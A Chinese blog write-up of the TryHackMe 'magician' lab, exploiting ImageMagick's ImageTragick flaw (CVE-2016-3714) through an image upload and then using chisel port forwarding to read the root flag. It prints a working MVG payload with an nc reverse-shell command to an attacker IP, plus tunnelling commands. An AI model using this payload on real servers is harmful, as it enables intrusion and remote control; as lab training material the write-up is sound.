TryHackMe - magician靶场

最新推荐文章于 2024-04-21 17:11:48 发布
最新推荐文章于 2024-04-21 17:11:48 发布
阅读量239 收藏
点赞数
分类专栏: Try Hack Me靶机 文章标签: 渗透测试 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/114700784
版权

magician

CVE-2016–3714
This magical website lets you convert image file formats

0x01 信息收集

Nmap扫描端口开放服务,开放了21,8080,8081端口
根据靶场提示要把ip指向域名:magician
 

0x02 漏洞利用(CVE-2016–3714)

先访问21端口,有个匿名访问,被做了点手脚“延迟”。登录进去里面是空的,根据提示访问 https://imagetragick.com.
根据给的网站提示,这个靶场的利用点大概是:CVE-2016–3714
 
访问8081端口,这里有个文件上传。先上传一张正常的png图片
 
截个包看看,正常
 
网上的exp有很多,我试了这个
 
试了各种shell都弹不回来
 
github上找到一个EXP
 
修改成自己攻击的ip
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 10.10.48.172 8888 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
pop graphic-context
pop graphic-context
成功弹回shell
 

0x03 ROOT Flag

成功读取了USER的Flag
接下来这个ROOT的Flag整我半天都没有进展。问下大佬叫我看本机端口
netstat -tulpn
我的天,之前都没有看这里的习惯。又学到了。
直接curl一下
 
是个网站,虽然可以直接curl请求上去。但是还是练练端口转发把
 
这边学大佬用的chisel这个转发工具。
wget 下载下来
 
用python把工具也传到目标机上
 
攻击机上执行:./chisel_1.7.6_linux_amd64 server --reverse --port 9001
目标机上执行:./chisel_1.7.6_linux_amd64 client 10.10.178.24:9001 R:9002:127.0.0.1:6666
把攻击机上的9002端口转发到目标机的6666端口上
 
访问该网站是个cat命令,直接读取root.txt,经过了base64编码
 
直接解码获得Flag
 
z4yn:)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6491
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
Laravel开发-magician
08-28
Laravel开发-magician 用于实现存储库的库,其中包含雄辩ORM的魔力查找器。
TryHackMe新手村
weixin_55154296的博客
04-17 7273
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
tryhackme
最新发布
2303_80978034的博客
04-21 943
TryHackMe是一个在线的网络安全学习平台,旨在帮助用户学习和提升网络安全技能。它提供了一系列的虚拟实验室和挑战,供用户进行实践和学习。通过TryHackMe,用户可以学习到各种网络安全相关的知识和技术,如渗透测试、漏洞利用、密码破解、网络分析等。TryHackMe的特点包括:.Web(网络安全) Web是CTF竞赛中主要的题型之一,题目涉及到许多常见的WEB漏洞,诸如XSS、文件包含、代码执行、上传漏洞、SQL注入。也有一些简单的关于网络基础知识的考察,例如返回包、TCP-IP、数据包内容和构造。可
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3635
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
Welcome to TryHackMe --- 我在TryHackMe学习的第90天
M1n9K1n9的博客
02-27 9797
TryHackMe以下内容均为个人感言,没有收thm一分钱2022年11月30号,我通过搜索引擎发现了TryHackMe这个平台,正如它所说的那样,这一切就像打游戏,你在游戏当中学习到知识,这是非常的快乐的注:(每个room都有对应的不同的靶机)你还在担心怎么学的时候,TryHackMe已经为你准备好了几个路径,只需要无脑跟着路径学就可以了每条路径都包含了相应的教学room,你将会在这些room中一边学一边实践tryhackme还有许多模块,每个模块当中包含着与其相关的许多个room。
TryHackMe-渗透测试7_log
M1n9K1n9的博客
12-21 401
whois、https://dnsdumpster.com/、nslookup的使用,侦察网站的公开信息。
javalruleetcode-magician:java学习
06-29
java lru leetcode ##Thinking in Java chapter21 ##Netty in Action ####chapter2: echo server/client ##数据结构与算法 ####动态规划 CUT: 分隔钢筋 LCS: 最长公共子序列 LIS: 最长递增子序列 ...[Lar
spotify-magician:Spotify的播放列表编辑器
03-30
Spotify魔术师 Spotify的播放列表编辑器 实时应用程序: : 该项目旨在改善Spotify的播放列表编辑(和可视化)功能。 到目前为止,这是一个纯粹基于客户端的Web应用程序。 它是使用和 (使用包装器)构建的。...
DobotStudioWindowsV1.4.12-Magician.zip
06-12
Dobot越疆魔术师机械臂是由深圳越疆科技有限公司主打了一款多功能高精度桌面智能机械臂,它操作简单、精准灵活、高度可拓展,是创客、机器人爱好者和编程初学者掌握机器人技术的桥梁。本资源为其操作平台 ...
php-image-magician:最好的图像处理
05-03
Include PHP Image Magician libraryrequire_once('php_image_magician.php');// Open JPG image$magicianObj = new imageLib('racecar.jpg');// Resize to best fit then crop$magicianObj -> resizeImage(100, 200...
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
[HACK学习呀] - 2021-01-30 内网渗透|Chisel内网穿透工具1
08-03
一、chisel工具介绍 二、chisel工具下载使用 三、chisel隧道搭建
TryHackMe-Wreath [网络杀伤链](windows网络)渗透测试
M1n9K1n9的博客
02-19 1943
了解如何通过破坏面向公众的 Web 计算机并通过隧道传输流量以访问 Wreath 网络中的其他计算机来透视网络。
TryHackMe-渗透测试5_log
M1n9K1n9的博客
12-21 361
tryhackme讲到的主要的点就是尝试闭合标签或者其他符号绕过,fetch()用于发起http请求btoa()用于将数据进行base64 encode。
TryHackMe-基本渗透测试
M1n9K1n9的博客
12-22 909
这里的主要目标是尽可能多地学习。确保您使用OpenVPN配置文件连接到我们的网络。部署机器并连接到我们的网络查找计算机公开的服务按照上面这句话,我们先使用nmap简单扫一圈┌──(root💀kali)-[]└─#nmap-sS访问80端口的web,好像没东西,到8080端口看一下,有网页。
tryhackme靶场: Mr Robot CTF
m0_64348326的博客
06-20 237
6.再来爆破出密码,这里字典太长且有很多数据重复,直接查看这部分的结果,在第八万多条的。8.根据选项面版RCE描述的方法,主题编辑器右侧找到404页面,添加。搭建的博客站登陆页面,根据登陆时的报错回显,利用下载的字典和。按照最新版的burp社区版爆破速度,估计要爆破到靶机结束。解密,但是还是得付费。需要收费,只能手动搜索了。,由于Linux系统的问题后面不需要再加。工具配合默认字典进行目录扫描,结果中的。7.进入后台后,准备查找历史漏洞,但是。命令,发现要输入密码,读取目录下的。命令开出bash命令窗。
DOBOT越疆 Magician-API接口说明
05-10
DOBOT越疆Magician是一款开源的机械臂,提供了多种接口方便用户进行二次开发。以下是Magician的API接口说明: 1. 串口通信接口:使用串口通信接口可以与Magician进行通信,并且控制机械臂的操作。串口通信接口的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值